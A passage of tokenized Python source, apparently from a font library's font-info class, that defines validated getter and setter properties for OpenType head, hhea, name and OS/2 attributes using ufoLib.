) : <EOL> return self . _openTypeHeadLowestRecPPEM <EOL> def _set_openTypeHeadLowestRecPPEM ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHeadLowestRecPPEM = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHeadLowestRecPPEM = value <EOL> self . dirty = True <EOL> openTypeHeadLowestRecPPEM = property ( _get_openTypeHeadLowestRecPPEM , _set_openTypeHeadLowestRecPPEM , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaAscender ( self ) : <EOL> return self . _openTypeHheaAscender <EOL> def _set_openTypeHheaAscender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaAscender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaAscender = value <EOL> self . dirty = True <EOL> openTypeHheaAscender = property ( _get_openTypeHheaAscender , _set_openTypeHheaAscender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaCaretOffset ( self ) : <EOL> return self . _openTypeHheaCaretOffset <EOL> def _set_openTypeHheaCaretOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaCaretOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaCaretOffset = value <EOL> self . dirty = True <EOL> openTypeHheaCaretOffset = property ( _get_openTypeHheaCaretOffset , _set_openTypeHheaCaretOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaCaretSlopeRise ( self ) : <EOL> return self . _openTypeHheaCaretSlopeRise <EOL> def _set_openTypeHheaCaretSlopeRise ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaCaretSlopeRise = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaCaretSlopeRise = value <EOL> self . dirty = True <EOL> openTypeHheaCaretSlopeRise = property ( _get_openTypeHheaCaretSlopeRise , _set_openTypeHheaCaretSlopeRise , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaCaretSlopeRun ( self ) : <EOL> return self . _openTypeHheaCaretSlopeRun <EOL> def _set_openTypeHheaCaretSlopeRun ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaCaretSlopeRun = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaCaretSlopeRun = value <EOL> self . dirty = True <EOL> openTypeHheaCaretSlopeRun = property ( _get_openTypeHheaCaretSlopeRun , _set_openTypeHheaCaretSlopeRun , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaDescender ( self ) : <EOL> return self . _openTypeHheaDescender <EOL> def _set_openTypeHheaDescender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaDescender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaDescender = value <EOL> self . dirty = True <EOL> openTypeHheaDescender = property ( _get_openTypeHheaDescender , _set_openTypeHheaDescender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeHheaLineGap ( self ) : <EOL> return self . _openTypeHheaLineGap <EOL> def _set_openTypeHheaLineGap ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeHheaLineGap = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeHheaLineGap = value <EOL> self . dirty = True <EOL> openTypeHheaLineGap = property ( _get_openTypeHheaLineGap , _set_openTypeHheaLineGap , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameCompatibleFullName ( self ) : <EOL> return self . _openTypeNameCompatibleFullName <EOL> def _set_openTypeNameCompatibleFullName ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameCompatibleFullName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameCompatibleFullName = value <EOL> self . dirty = True <EOL> openTypeNameCompatibleFullName = property ( _get_openTypeNameCompatibleFullName , _set_openTypeNameCompatibleFullName , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameDescription ( self ) : <EOL> return self . _openTypeNameDescription <EOL> def _set_openTypeNameDescription ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameDescription = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameDescription = value <EOL> self . dirty = True <EOL> openTypeNameDescription = property ( _get_openTypeNameDescription , _set_openTypeNameDescription , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameDesigner ( self ) : <EOL> return self . _openTypeNameDesigner <EOL> def _set_openTypeNameDesigner ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameDesigner = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameDesigner = value <EOL> self . dirty = True <EOL> openTypeNameDesigner = property ( _get_openTypeNameDesigner , _set_openTypeNameDesigner , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameDesignerURL ( self ) : <EOL> return self . _openTypeNameDesignerURL <EOL> def _set_openTypeNameDesignerURL ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameDesignerURL = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameDesignerURL = value <EOL> self . dirty = True <EOL> openTypeNameDesignerURL = property ( _get_openTypeNameDesignerURL , _set_openTypeNameDesignerURL , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameLicense ( self ) : <EOL> return self . _openTypeNameLicense <EOL> def _set_openTypeNameLicense ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameLicense = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameLicense = value <EOL> self . dirty = True <EOL> openTypeNameLicense = property ( _get_openTypeNameLicense , _set_openTypeNameLicense , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameLicenseURL ( self ) : <EOL> return self . _openTypeNameLicenseURL <EOL> def _set_openTypeNameLicenseURL ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameLicenseURL = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameLicenseURL = value <EOL> self . dirty = True <EOL> openTypeNameLicenseURL = property ( _get_openTypeNameLicenseURL , _set_openTypeNameLicenseURL , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameManufacturer ( self ) : <EOL> return self . _openTypeNameManufacturer <EOL> def _set_openTypeNameManufacturer ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameManufacturer = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameManufacturer = value <EOL> self . dirty = True <EOL> openTypeNameManufacturer = property ( _get_openTypeNameManufacturer , _set_openTypeNameManufacturer , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameManufacturerURL ( self ) : <EOL> return self . _openTypeNameManufacturerURL <EOL> def _set_openTypeNameManufacturerURL ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameManufacturerURL = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameManufacturerURL = value <EOL> self . dirty = True <EOL> openTypeNameManufacturerURL = property ( _get_openTypeNameManufacturerURL , _set_openTypeNameManufacturerURL , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNamePreferredFamilyName ( self ) : <EOL> return self . _openTypeNamePreferredFamilyName <EOL> def _set_openTypeNamePreferredFamilyName ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNamePreferredFamilyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNamePreferredFamilyName = value <EOL> self . dirty = True <EOL> openTypeNamePreferredFamilyName = property ( _get_openTypeNamePreferredFamilyName , _set_openTypeNamePreferredFamilyName , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNamePreferredSubfamilyName ( self ) : <EOL> return self . _openTypeNamePreferredSubfamilyName <EOL> def _set_openTypeNamePreferredSubfamilyName ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNamePreferredSubfamilyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNamePreferredSubfamilyName = value <EOL> self . dirty = True <EOL> openTypeNamePreferredSubfamilyName = property ( _get_openTypeNamePreferredSubfamilyName , _set_openTypeNamePreferredSubfamilyName , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameSampleText ( self ) : <EOL> return self . _openTypeNameSampleText <EOL> def _set_openTypeNameSampleText ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameSampleText = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameSampleText = value <EOL> self . dirty = True <EOL> openTypeNameSampleText = property ( _get_openTypeNameSampleText , _set_openTypeNameSampleText , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameUniqueID ( self ) : <EOL> return self . _openTypeNameUniqueID <EOL> def _set_openTypeNameUniqueID ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameUniqueID = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameUniqueID = value <EOL> self . dirty = True <EOL> openTypeNameUniqueID = property ( _get_openTypeNameUniqueID , _set_openTypeNameUniqueID , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameVersion ( self ) : <EOL> return self . _openTypeNameVersion <EOL> def _set_openTypeNameVersion ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameVersion = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameVersion = value <EOL> self . dirty = True <EOL> openTypeNameVersion = property ( _get_openTypeNameVersion , _set_openTypeNameVersion , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameWWSFamilyName ( self ) : <EOL> return self . _openTypeNameWWSFamilyName <EOL> def _set_openTypeNameWWSFamilyName ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameWWSFamilyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameWWSFamilyName = value <EOL> self . dirty = True <EOL> openTypeNameWWSFamilyName = property ( _get_openTypeNameWWSFamilyName , _set_openTypeNameWWSFamilyName , doc = "<STR_LIT>" ) <EOL> def _get_openTypeNameWWSSubfamilyName ( self ) : <EOL> return self . _openTypeNameWWSSubfamilyName <EOL> def _set_openTypeNameWWSSubfamilyName ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeNameWWSSubfamilyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeNameWWSSubfamilyName = value <EOL> self . dirty = True <EOL> openTypeNameWWSSubfamilyName = property ( _get_openTypeNameWWSSubfamilyName , _set_openTypeNameWWSSubfamilyName , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2CodePageRanges ( self ) : <EOL> return self . _openTypeOS2CodePageRanges <EOL> def _set_openTypeOS2CodePageRanges ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2CodePageRanges = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2CodePageRanges = value <EOL> self . dirty = True <EOL> openTypeOS2CodePageRanges = property ( _get_openTypeOS2CodePageRanges , _set_openTypeOS2CodePageRanges , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2FamilyClass ( self ) : <EOL> return self . _openTypeOS2FamilyClass <EOL> def _set_openTypeOS2FamilyClass ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2FamilyClass = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2FamilyClass = value <EOL> self . dirty = True <EOL> openTypeOS2FamilyClass = property ( _get_openTypeOS2FamilyClass , _set_openTypeOS2FamilyClass , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2Panose ( self ) : <EOL> return self . _openTypeOS2Panose <EOL> def _set_openTypeOS2Panose ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2Panose = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2Panose = value <EOL> self . dirty = True <EOL> openTypeOS2Panose = property ( _get_openTypeOS2Panose , _set_openTypeOS2Panose , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2Selection ( self ) : <EOL> return self . _openTypeOS2Selection <EOL> def _set_openTypeOS2Selection ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2Selection = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2Selection = value <EOL> self . dirty = True <EOL> openTypeOS2Selection = property ( _get_openTypeOS2Selection , _set_openTypeOS2Selection , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2StrikeoutPosition ( self ) : <EOL> return self . _openTypeOS2StrikeoutPosition <EOL> def _set_openTypeOS2StrikeoutPosition ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2StrikeoutPosition = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2StrikeoutPosition = value <EOL> self . dirty = True <EOL> openTypeOS2StrikeoutPosition = property ( _get_openTypeOS2StrikeoutPosition , _set_openTypeOS2StrikeoutPosition , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2StrikeoutSize ( self ) : <EOL> return self . _openTypeOS2StrikeoutSize <EOL> def _set_openTypeOS2StrikeoutSize ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2StrikeoutSize = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2StrikeoutSize = value <EOL> self . dirty = True <EOL> openTypeOS2StrikeoutSize = property ( _get_openTypeOS2StrikeoutSize , _set_openTypeOS2StrikeoutSize , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SubscriptXOffset ( self ) : <EOL> return self . _openTypeOS2SubscriptXOffset <EOL> def _set_openTypeOS2SubscriptXOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SubscriptXOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SubscriptXOffset = value <EOL> self . dirty = True <EOL> openTypeOS2SubscriptXOffset = property ( _get_openTypeOS2SubscriptXOffset , _set_openTypeOS2SubscriptXOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SubscriptXSize ( self ) : <EOL> return self . _openTypeOS2SubscriptXSize <EOL> def _set_openTypeOS2SubscriptXSize ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SubscriptXSize = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SubscriptXSize = value <EOL> self . dirty = True <EOL> openTypeOS2SubscriptXSize = property ( _get_openTypeOS2SubscriptXSize , _set_openTypeOS2SubscriptXSize , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SubscriptYOffset ( self ) : <EOL> return self . _openTypeOS2SubscriptYOffset <EOL> def _set_openTypeOS2SubscriptYOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SubscriptYOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SubscriptYOffset = value <EOL> self . dirty = True <EOL> openTypeOS2SubscriptYOffset = property ( _get_openTypeOS2SubscriptYOffset , _set_openTypeOS2SubscriptYOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SubscriptYSize ( self ) : <EOL> return self . _openTypeOS2SubscriptYSize <EOL> def _set_openTypeOS2SubscriptYSize ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SubscriptYSize = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SubscriptYSize = value <EOL> self . dirty = True <EOL> openTypeOS2SubscriptYSize = property ( _get_openTypeOS2SubscriptYSize , _set_openTypeOS2SubscriptYSize , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SuperscriptXOffset ( self ) : <EOL> return self . _openTypeOS2SuperscriptXOffset <EOL> def _set_openTypeOS2SuperscriptXOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SuperscriptXOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SuperscriptXOffset = value <EOL> self . dirty = True <EOL> openTypeOS2SuperscriptXOffset = property ( _get_openTypeOS2SuperscriptXOffset , _set_openTypeOS2SuperscriptXOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SuperscriptXSize ( self ) : <EOL> return self . _openTypeOS2SuperscriptXSize <EOL> def _set_openTypeOS2SuperscriptXSize ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SuperscriptXSize = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SuperscriptXSize = value <EOL> self . dirty = True <EOL> openTypeOS2SuperscriptXSize = property ( _get_openTypeOS2SuperscriptXSize , _set_openTypeOS2SuperscriptXSize , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SuperscriptYOffset ( self ) : <EOL> return self . _openTypeOS2SuperscriptYOffset <EOL> def _set_openTypeOS2SuperscriptYOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SuperscriptYOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SuperscriptYOffset = value <EOL> self . dirty = True <EOL> openTypeOS2SuperscriptYOffset = property ( _get_openTypeOS2SuperscriptYOffset , _set_openTypeOS2SuperscriptYOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2SuperscriptYSize ( self ) : <EOL> return self . _openTypeOS2SuperscriptYSize <EOL> def _set_openTypeOS2SuperscriptYSize ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2SuperscriptYSize = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2SuperscriptYSize = value <EOL> self . dirty = True <EOL> openTypeOS2SuperscriptYSize = property ( _get_openTypeOS2SuperscriptYSize , _set_openTypeOS2SuperscriptYSize , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2Type ( self ) : <EOL> return self . _openTypeOS2Type <EOL> def _set_openTypeOS2Type ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2Type = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2Type = value <EOL> self . dirty = True <EOL> openTypeOS2Type = property ( _get_openTypeOS2Type , _set_openTypeOS2Type , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2TypoAscender ( self ) : <EOL> return self . _openTypeOS2TypoAscender <EOL> def _set_openTypeOS2TypoAscender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2TypoAscender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2TypoAscender = value <EOL> self . dirty = True <EOL> openTypeOS2TypoAscender = property ( _get_openTypeOS2TypoAscender , _set_openTypeOS2TypoAscender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2TypoDescender ( self ) : <EOL> return self . _openTypeOS2TypoDescender <EOL> def _set_openTypeOS2TypoDescender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2TypoDescender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2TypoDescender = value <EOL> self . dirty = True <EOL> openTypeOS2TypoDescender = property ( _get_openTypeOS2TypoDescender , _set_openTypeOS2TypoDescender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2TypoLineGap ( self ) : <EOL> return self . _openTypeOS2TypoLineGap <EOL> def _set_openTypeOS2TypoLineGap ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2TypoLineGap = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2TypoLineGap = value <EOL> self . dirty = True <EOL> openTypeOS2TypoLineGap = property ( _get_openTypeOS2TypoLineGap , _set_openTypeOS2TypoLineGap , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2UnicodeRanges ( self ) : <EOL> return self . _openTypeOS2UnicodeRanges <EOL> def _set_openTypeOS2UnicodeRanges ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2UnicodeRanges = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2UnicodeRanges = value <EOL> self . dirty = True <EOL> openTypeOS2UnicodeRanges = property ( _get_openTypeOS2UnicodeRanges , _set_openTypeOS2UnicodeRanges , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2VendorID ( self ) : <EOL> return self . _openTypeOS2VendorID <EOL> def _set_openTypeOS2VendorID ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2VendorID = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2VendorID = value <EOL> self . dirty = True <EOL> openTypeOS2VendorID = property ( _get_openTypeOS2VendorID , _set_openTypeOS2VendorID , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2WeightClass ( self ) : <EOL> return self . _openTypeOS2WeightClass <EOL> def _set_openTypeOS2WeightClass ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2WeightClass = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2WeightClass = value <EOL> self . dirty = True <EOL> openTypeOS2WeightClass = property ( _get_openTypeOS2WeightClass , _set_openTypeOS2WeightClass , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2WidthClass ( self ) : <EOL> return self . _openTypeOS2WidthClass <EOL> def _set_openTypeOS2WidthClass ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2WidthClass = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2WidthClass = value <EOL> self . dirty = True <EOL> openTypeOS2WidthClass = property ( _get_openTypeOS2WidthClass , _set_openTypeOS2WidthClass , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2WinAscent ( self ) : <EOL> return self . _openTypeOS2WinAscent <EOL> def _set_openTypeOS2WinAscent ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2WinAscent = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2WinAscent = value <EOL> self . dirty = True <EOL> openTypeOS2WinAscent = property ( _get_openTypeOS2WinAscent , _set_openTypeOS2WinAscent , doc = "<STR_LIT>" ) <EOL> def _get_openTypeOS2WinDescent ( self ) : <EOL> return self . _openTypeOS2WinDescent <EOL> def _set_openTypeOS2WinDescent ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeOS2WinDescent = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeOS2WinDescent = value <EOL> self . dirty = True <EOL> openTypeOS2WinDescent = property ( _get_openTypeOS2WinDescent , _set_openTypeOS2WinDescent , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaCaretOffset ( self ) : <EOL> return self . 